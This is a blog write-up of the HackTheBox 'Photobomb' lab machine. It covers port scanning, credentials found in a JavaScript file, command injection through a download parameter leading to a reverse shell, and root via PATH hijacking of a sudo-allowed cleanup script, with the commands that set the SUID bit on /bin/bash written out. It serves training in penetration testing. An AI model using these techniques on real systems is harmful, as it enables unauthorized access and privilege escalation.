<!doctype html>
<html lang="en-us">
  <head>
    <title>HackTheBox Photobomb // 53CTF</title>
    <link rel="shortcut icon" href="/favicon.ico" />
    <meta charset="utf-8" />
    <meta name="generator" content="Hugo 0.108.0">
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="author" content="5YC10P5" />
    <meta name="description" content="" />
    <link rel="stylesheet" href="/css/main.min.1b165e60871be07c93da04ef30238e50223c9da30f957d760f25b24143926af9.css" />

    
    <meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="HackTheBox Photobomb"/>
<meta name="twitter:description" content="Name: Photobomb IP: 10.10.11.182 Defficulty: Easy OS: Linux Author: slartibartfast Nmap PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 e22473bbfbdf5cb520b66876748ab58d (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCwlzrcH3g6&#43;RJ9JSdH4fFJPibAIpAZXAl7vCJA&#43;98jmlaLCsANWQXth3UsQ&#43;TCEf9YydmNXO2QAIocVR8y1NUEYBlN2xG4/7txjoXr9QShFwd10HNbULQyrGzPaFEN2O/7R90uP6lxQIDsoKJu2Ihs/4YFit79oSsCPMDPn8XS1fX/BRRhz1BDqKlLPdRIzvbkauo6QEhOiaOG1pxqOj50JVWO3XNpnzPxB01fo1GiaE4q5laGbktQagtqhz87SX7vWBwJXXKA/IennJIBPcyD1G6YUK0k6lDow&#43;OUdXlmoxw&#43;n370Knl6PYxyDwuDnvkPabPhkCnSvlgGKkjxvqks9axnQYxkieDqIgOmIrMheEqF6GXO5zz6WtN62UAIKAgxRPgIW0SjRw2sWBnT9GnLag74cmhpGaIoWunklT2c94J7t&#43;kpLAcsES6&#43;yFp9Wzbk1vsqThAss0BkVsyxzvL0U9HvcyyDKLGFlFPbsiFH7br/PuxGbqdO9Jbrrs9nx60= | 256 04e3ac6e184e1b7effac4fe39dd21bae (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBrVE9flXamwUY&#43;wiBc9IhaQJRE40YpDsbOGPxLWCKKjNAnSBYA9CPsdgZhoV8rtORq/4n&#43;SO0T80x1wW3g19Ew= | 256 20e05d8cba71f08c3a1819f24011d29e (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEp8nHKD5peyVy3X3MsJCmH/HIUvJT&#43;MONekDg5xYZ6D 80/tcp open http syn-ack nginx 1.18.0 (Ubuntu) |_http-server-header: nginx/1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://photobomb.htb/ | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Two ports are open."/>

    <meta property="og:title" content="HackTheBox Photobomb" />
<meta property="og:description" content="Name: Photobomb IP: 10.10.11.182 Defficulty: Easy OS: Linux Author: slartibartfast Nmap PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 e22473bbfbdf5cb520b66876748ab58d (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCwlzrcH3g6&#43;RJ9JSdH4fFJPibAIpAZXAl7vCJA&#43;98jmlaLCsANWQXth3UsQ&#43;TCEf9YydmNXO2QAIocVR8y1NUEYBlN2xG4/7txjoXr9QShFwd10HNbULQyrGzPaFEN2O/7R90uP6lxQIDsoKJu2Ihs/4YFit79oSsCPMDPn8XS1fX/BRRhz1BDqKlLPdRIzvbkauo6QEhOiaOG1pxqOj50JVWO3XNpnzPxB01fo1GiaE4q5laGbktQagtqhz87SX7vWBwJXXKA/IennJIBPcyD1G6YUK0k6lDow&#43;OUdXlmoxw&#43;n370Knl6PYxyDwuDnvkPabPhkCnSvlgGKkjxvqks9axnQYxkieDqIgOmIrMheEqF6GXO5zz6WtN62UAIKAgxRPgIW0SjRw2sWBnT9GnLag74cmhpGaIoWunklT2c94J7t&#43;kpLAcsES6&#43;yFp9Wzbk1vsqThAss0BkVsyxzvL0U9HvcyyDKLGFlFPbsiFH7br/PuxGbqdO9Jbrrs9nx60= | 256 04e3ac6e184e1b7effac4fe39dd21bae (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBrVE9flXamwUY&#43;wiBc9IhaQJRE40YpDsbOGPxLWCKKjNAnSBYA9CPsdgZhoV8rtORq/4n&#43;SO0T80x1wW3g19Ew= | 256 20e05d8cba71f08c3a1819f24011d29e (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEp8nHKD5peyVy3X3MsJCmH/HIUvJT&#43;MONekDg5xYZ6D 80/tcp open http syn-ack nginx 1.18.0 (Ubuntu) |_http-server-header: nginx/1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://photobomb.htb/ | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Two ports are open." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://53ctf.github.io/posts/htb/photobomb/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2023-01-15T14:06:58+05:30" />
<meta property="article:modified_time" content="2023-01-15T14:06:58+05:30" />


  </head>
  <body>
    <header class="app-header">
      <a href="https://53ctf.github.io/"><img class="app-header-avatar" src="/avatar.jpg" alt="5YC10P5" /></a>
      <span class="app-header-title">53CTF</span>
      <nav class="app-header-menu">
          <a class="app-header-menu-item" href="/">Home</a>
             - 
          
          <a class="app-header-menu-item" href="/tags/hackthebox/">HTB</a>
             - 
          
          <a class="app-header-menu-item" href="/tags/notes/">Notes</a>
             - 
          
          <a class="app-header-menu-item" href="/about/">About</a>
      </nav>
      <p>This is where I keep my notes and also where I post articles, writeups, walkthroughs and stuff like that so everybody else can learn something out of it.....</p>
      <div class="app-header-social">
        
          <a href="https://github.com/53ctf" target="_blank" rel="noreferrer noopener me">
            <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-github">
  <title>Github</title>
  <path d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22"></path>
</svg>
          </a>
        
          <a href="https://twitter.com/syclops101" target="_blank" rel="noreferrer noopener me">
            <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-twitter">
  <title>Twitter</title>
  <path d="M23 3a10.9 10.9 0 0 1-3.14 1.53 4.48 4.48 0 0 0-7.86 3v1A10.66 10.66 0 0 1 3 4s-4 9 5 13a11.64 11.64 0 0 1-7 2c9 5 20 0 20-11.5a4.5 4.5 0 0 0-.08-.83A7.72 7.72 0 0 0 23 3z"></path>
</svg>
          </a>
        
          <a href="https://web.facebook.com/syclops101" target="_blank" rel="noreferrer noopener me">
            <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-facebook">
  <title>HackTheBox</title>
  <path d="M18 2h-3a5 5 0 0 0-5 5v3H7v4h3v8h4v-8h3l1-4h-4V7a1 1 0 0 1 1-1h3z"></path>
</svg>
          </a>
        
      </div>
    </header>
    <main class="app-container">
      
  <article class="post">
    <header class="post-header">
      <h1 class ="post-title">HackTheBox Photobomb</h1>
      <div class="post-meta">
        <div>
          <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-calendar">
  <title>calendar</title>
  <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line>
</svg>
          Jan 15, 2023
        </div>
        <div>
          <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-clock">
  <title>clock</title>
  <circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline>
</svg>
          4 min read
        </div>
        <div>
          <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-tag">
  <title>tag</title>
  <path d="M20.59 13.41l-7.17 7.17a2 2 0 0 1-2.83 0L2 12V2h10l8.59 8.59a2 2 0 0 1 0 2.82z"></path><line x1="7" y1="7" x2="7.01" y2="7"></line>
</svg>
              <a class="tag" href="https://53ctf.github.io/tags/hackthebox/">HackTheBox</a>
        </div>
      </div>
    </header>
    <div class="post-content">
      <ul>
<li>Name: Photobomb</li>
<li>IP: 10.10.11.182</li>
<li>Defficulty: Easy</li>
<li>OS: Linux</li>
<li>Author: <a href="https://www.hackthebox.com/home/users/profile/85231">slartibartfast</a></li>
</ul>
<h2 id="nmap">Nmap</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>PORT   STATE SERVICE REASON  VERSION
</span></span><span style="display:flex;"><span>22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 <span style="color:#f92672">(</span>Ubuntu Linux; protocol 2.0<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>| ssh-hostkey:
</span></span><span style="display:flex;"><span>|   <span style="color:#ae81ff">3072</span> e22473bbfbdf5cb520b66876748ab58d <span style="color:#f92672">(</span>RSA<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCwlzrcH3g6+RJ9JSdH4fFJPibAIpAZXAl7vCJA+98jmlaLCsANWQXth3UsQ+TCEf9YydmNXO2QAIocVR8y1NUEYBlN2xG4/7txjoXr9QShFwd10HNbULQyrGzPaFEN2O/7R90uP6lxQIDsoKJu2Ihs/4YFit79oSsCPMDPn8XS1fX/BRRhz1BDqKlLPdRIzvbkauo6QEhOiaOG1pxqOj50JVWO3XNpnzPxB01fo1GiaE4q5laGbktQagtqhz87SX7vWBwJXXKA/IennJIBPcyD1G6YUK0k6lDow+OUdXlmoxw+n370Knl6PYxyDwuDnvkPabPhkCnSvlgGKkjxvqks9axnQYxkieDqIgOmIrMheEqF6GXO5zz6WtN62UAIKAgxRPgIW0SjRw2sWBnT9GnLag74cmhpGaIoWunklT2c94J7t+kpLAcsES6+yFp9Wzbk1vsqThAss0BkVsyxzvL0U9HvcyyDKLGFlFPbsiFH7br/PuxGbqdO9Jbrrs9nx60<span style="color:#f92672">=</span>
</span></span><span style="display:flex;"><span>|   <span style="color:#ae81ff">256</span> 04e3ac6e184e1b7effac4fe39dd21bae <span style="color:#f92672">(</span>ECDSA<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBrVE9flXamwUY+wiBc9IhaQJRE40YpDsbOGPxLWCKKjNAnSBYA9CPsdgZhoV8rtORq/4n+SO0T80x1wW3g19Ew<span style="color:#f92672">=</span>
</span></span><span style="display:flex;"><span>|   <span style="color:#ae81ff">256</span> 20e05d8cba71f08c3a1819f24011d29e <span style="color:#f92672">(</span>ED25519<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEp8nHKD5peyVy3X3MsJCmH/HIUvJT+MONekDg5xYZ6D
</span></span><span style="display:flex;"><span>80/tcp open  http    syn-ack nginx 1.18.0 <span style="color:#f92672">(</span>Ubuntu<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>|_http-server-header: nginx/1.18.0 <span style="color:#f92672">(</span>Ubuntu<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>|_http-title: Did not follow redirect to http://photobomb.htb/
</span></span><span style="display:flex;"><span>| http-methods:
</span></span><span style="display:flex;"><span>|_  Supported Methods: GET HEAD POST OPTIONS
</span></span><span style="display:flex;"><span>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</span></span></code></pre></div><p>Two ports are open.</p>
<ul>
<li>22/TCP  SSH
<ul>
<li>OpenSSH 8.2p1</li>
<li>And its banner says that this is a <a href="https://launchpad.net/ubuntu/+source/openssh/1:7.6p1-4ubuntu0.5">Ubuntu</a> box</li>
</ul>
</li>
<li>80/TCP  HTTP
<ul>
<li>nginx 1.18.0</li>
<li>And its banner says that this is a <a href="https://launchpad.net/ubuntu/+source/openssh/1:7.6p1-4ubuntu0.5">Ubuntu</a> box</li>
<li>Add <code>photobomb.htb</code> into the <code>/etc/hosts</code></li>
</ul>
</li>
</ul>
<h2 id="web-enumeration">Web Enumeration</h2>
<p>If we look at the source code of the <code>http://photobomb.htb/</code> you can find two interesting things.</p>
<ul>
<li>A directory <code>/printer</code></li>
<li>A custom javasript name <code>photobomb.js</code>
`<img src="images/source.png" alt="Source Code"></li>
</ul>
<p>When we visit the <code>http://photobomb.htb/printer</code>, it asks us for credentials.
But if visit the <code>http://photobomb.htb/photobomb.js</code>, we can see this piece of code which contains the credentials for <code>http://photobomb.htb/printer</code>.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-js" data-lang="js"><span style="display:flex;"><span><span style="color:#66d9ef">function</span> <span style="color:#a6e22e">init</span>() {
</span></span><span style="display:flex;"><span>  <span style="color:#75715e">// Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>  <span style="color:#66d9ef">if</span> (document.<span style="color:#a6e22e">cookie</span>.<span style="color:#a6e22e">match</span>(<span style="color:#e6db74">/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/</span>)) {
</span></span><span style="display:flex;"><span>    document.<span style="color:#a6e22e">getElementsByClassName</span>(<span style="color:#e6db74">&#39;creds&#39;</span>)[<span style="color:#ae81ff">0</span>].<span style="color:#a6e22e">setAttribute</span>(<span style="color:#e6db74">&#39;href&#39;</span>,<span style="color:#e6db74">&#39;http://p***0:b***!@photobomb.htb/printer&#39;</span>);
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>window.<span style="color:#a6e22e">onload</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">init</span>;
</span></span></code></pre></div><p>Let&rsquo;s login to <code>http://photobomb.htb/printer</code>. Once you&rsquo;ve logged into it, you can see its a site where you can download photos either as a <code>jpg</code> or <code>png</code>.</p>
<h2 id="foothold-wizard">Foothold [Wizard]</h2>
<p>After a while I found a <a href="https://owasp.org/www-community/attacks/Command_Injection">Command Injection</a>.</p>
<p>If we capture the request of the download request of the png image, we can abuse the <code>filetype</code> parameter to get a <code>Command Injection</code> to working. Here is how we test it.</p>
<p>Start a python web server.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>&gt; sudo python3 -m http.server <span style="color:#ae81ff">80</span>
</span></span><span style="display:flex;"><span>Serving HTTP on 0.0.0.0 port <span style="color:#ae81ff">80</span> <span style="color:#f92672">(</span>http://0.0.0.0:80/<span style="color:#f92672">)</span> ...
</span></span></code></pre></div><p>In the BurpSuite, payload would be looks like this.
<img src="images/command_injection_test.png" alt="Command Injection Test"></p>
<p>And make sure to <strong>URLEncode</strong> the payload before you send it.
<img src="images/urlencoded.png" alt="URLEncoded"></p>
<p>And when we send the request, we can see a hit on our python server.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>10.10.11.182 - - <span style="color:#f92672">[</span>15/Jan/2023 16:00:03<span style="color:#f92672">]</span> code 404, message File not found
</span></span><span style="display:flex;"><span>10.10.11.182 - - <span style="color:#f92672">[</span>15/Jan/2023 16:00:03<span style="color:#f92672">]</span> <span style="color:#e6db74">&#34;GET /CommandInjectionConfiremed HTTP/1.1&#34;</span> <span style="color:#ae81ff">404</span> -
</span></span></code></pre></div><p>Since we have a command injection, now we can get a reverse shell. So let&rsquo;s get one and capture the user flag.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>wizard@photobomb:~$ whoami
</span></span><span style="display:flex;"><span>wizard
</span></span><span style="display:flex;"><span>wizard@photobomb:~$ id
</span></span><span style="display:flex;"><span>uid<span style="color:#f92672">=</span>1000<span style="color:#f92672">(</span>wizard<span style="color:#f92672">)</span> gid<span style="color:#f92672">=</span>1000<span style="color:#f92672">(</span>wizard<span style="color:#f92672">)</span> groups<span style="color:#f92672">=</span>1000<span style="color:#f92672">(</span>wizard<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>wizard@photobomb:~$ cat user.txt
</span></span><span style="display:flex;"><span>8b9**************************acd
</span></span></code></pre></div><h2 id="privesc-root">Privesc [Root]</h2>
<p>User <code>wizard</code> can run <code>/opt/cleanup.sh</code> as the <code>root</code> user with no password and can change or add an environment variables.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>wizard@photobomb:~$ sudo -l
</span></span><span style="display:flex;"><span>Matching Defaults entries <span style="color:#66d9ef">for</span> wizard on photobomb:
</span></span><span style="display:flex;"><span>    env_reset, mail_badpass,
</span></span><span style="display:flex;"><span>    secure_path<span style="color:#f92672">=</span>/usr/local/sbin<span style="color:#ae81ff">\:</span>/usr/local/bin<span style="color:#ae81ff">\:</span>/usr/sbin<span style="color:#ae81ff">\:</span>/usr/bin<span style="color:#ae81ff">\:</span>/sbin<span style="color:#ae81ff">\:</span>/bin<span style="color:#ae81ff">\:</span>/snap/bin
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>User wizard may run the following commands on photobomb:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">(</span>root<span style="color:#f92672">)</span> SETENV: NOPASSWD: /opt/cleanup.sh
</span></span></code></pre></div><p>And that file is owned by root.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>wizard@photobomb:~$ ls -la /opt/cleanup.sh
</span></span><span style="display:flex;"><span>-r-xr-xr-x <span style="color:#ae81ff">1</span> root root <span style="color:#ae81ff">340</span> Sep <span style="color:#ae81ff">15</span> 12:11 /opt/cleanup.sh
</span></span></code></pre></div><p>If we read the <code>/opt/cleanup.sh</code>, we can notice the vulnerability right away.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e">#!/bin/bash
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>. /opt/.bashrc
</span></span><span style="display:flex;"><span>cd /home/wizard/photobomb
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># clean up log files</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> -s log/photobomb.log <span style="color:#f92672">]</span> <span style="color:#f92672">&amp;&amp;</span> ! <span style="color:#f92672">[</span> -L log/photobomb.log <span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>  /bin/cat log/photobomb.log &gt; log/photobomb.log.old
</span></span><span style="display:flex;"><span>  /usr/bin/truncate -s0 log/photobomb.log
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># protect the priceless originals</span>
</span></span><span style="display:flex;"><span>find source_images -type f -name <span style="color:#e6db74">&#39;*.jpg&#39;</span> -exec chown root:root <span style="color:#f92672">{}</span> <span style="color:#ae81ff">\;</span>
</span></span></code></pre></div><p>In this script, they did same mistake twice. The &lsquo;mistake&rsquo; is, when we specify a binary in a script, we need to specify its <code>realpath</code> instead of <code>relative path</code>. Which means if we want to specify <code>locate</code> inside of a script, we have to specify it <code>/usr/bin/locate</code> like this.</p>
<p>In the <code>/opt/cleanup.sh</code> we have <code>cd</code> and <code>find</code> commands with that vulnerability. So let&rsquo;s exploit that and leverage our privileges to the <code>root</code> user.</p>
<p>Create a malicious file called <code>find</code> and change permissions of it.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>wizard@photobomb:~$ echo <span style="color:#e6db74">&#34;chmod u+s /bin/bash&#34;</span> &gt; find
</span></span><span style="display:flex;"><span>wizard@photobomb:~$ chmod +x find
</span></span></code></pre></div><p>Then run the <code>/opt/cleanup.sh</code></p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>sudo PATH<span style="color:#f92672">=</span>$PWD:$PATH /opt/cleanup.sh
</span></span></code></pre></div><p>Now if look <code>/bin/bash</code> it has <code>SUID</code> bit bind to it.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>wizard@photobomb:~$ ls -la /bin/bash
</span></span><span style="display:flex;"><span>-rwsr-xr-x <span style="color:#ae81ff">1</span> root root <span style="color:#ae81ff">1183448</span> Apr <span style="color:#ae81ff">18</span>  <span style="color:#ae81ff">2022</span> /bin/bash
</span></span></code></pre></div><p>Now we can become root and capture the root flag.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>wizard@photobomb:~$ /bin/bash -p
</span></span><span style="display:flex;"><span>bash-5.0# whoami
</span></span><span style="display:flex;"><span>root
</span></span><span style="display:flex;"><span>bash-5.0# id
</span></span><span style="display:flex;"><span>uid<span style="color:#f92672">=</span>1000<span style="color:#f92672">(</span>wizard<span style="color:#f92672">)</span> gid<span style="color:#f92672">=</span>1000<span style="color:#f92672">(</span>wizard<span style="color:#f92672">)</span> euid<span style="color:#f92672">=</span>0<span style="color:#f92672">(</span>root<span style="color:#f92672">)</span> groups<span style="color:#f92672">=</span>1000<span style="color:#f92672">(</span>wizard<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>bash-5.0# cat /root/root.txt
</span></span><span style="display:flex;"><span>c02**************************7f6
</span></span></code></pre></div>
    </div>
    <div class="post-footer">
      
    </div>
  </article>

    </main>
  </body>
</html>
